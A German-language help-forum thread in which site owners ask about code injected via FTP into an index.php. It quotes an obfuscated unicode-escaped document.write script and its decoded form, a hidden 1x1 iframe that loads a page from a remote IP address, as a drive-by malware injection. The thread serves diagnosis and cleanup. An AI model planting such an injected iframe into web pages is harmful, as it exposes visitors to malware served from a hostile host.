• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

iframe - Was macht dieser Code?

Status
Für weitere Antworten geschlossen.
S

sascha_1

Neues Mitglied
Hallo zusammen,

bei meinem Freund wurde über den FTP die index.php erweitert und folgendes hinzugefügt

Code: 
</html><!-- ~ --><!-- Nerzul --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><!-- Nerzul --><!-- ~ -->
Ich habe es nun decoded und erhalte folgendes:

Code: 
<iframe src="http://58.65.235.41/llll/stds/go.php?sid=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Was genau macht das, habe von html gar keine Ahnung!

Danke im vorraus
 
Hallo.

Das erzeugt einen Inline-Frame der Größe 1x1px, setzt den per CSS auf unsichtbar, und lädt darin die URL, die im Attribut "src" angegeben ist.

Gruß,
-Efchen
 
sascha_1 schrieb:
Hallo zusammen,

bei meinem Freund wurde über den FTP die index.php erweitert und folgendes hinzugefügt

Code: 
</html><!-- ~ --><!-- Nerzul --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><!-- Nerzul --><!-- ~ -->
Zum Vergrößern anklicken....

irgendwas kann doch da nicht stimmen ?!?
Inhalte in einer HTML-Datei nach dem schließenden HTML-Tag?
 
Ich hab das gleiche Problem.
Als ich eben einen HTML-Validator nutzen wollte ist mir aufgefallen das dieser Code außerhalb des html-Tags in meiner index.php enthalten ist, den ich da definitiv nicht selber eingefügt habe.
Weißt du genaueres über den Ablauf der Infektion der Datei? Bist du dir sicher das es per FTP passiert ist?
 
hey

junge lass die finger davon das issn virus...-.- ich hab mir meine komplette website damit gelöscht...weil ich zu nuegierig bin und die scheisse ma gleich eingefpgt hab xD^^ also lösch das
 
Status
Für weitere Antworten geschlossen.

Neueste Beiträge

Zurück
Oben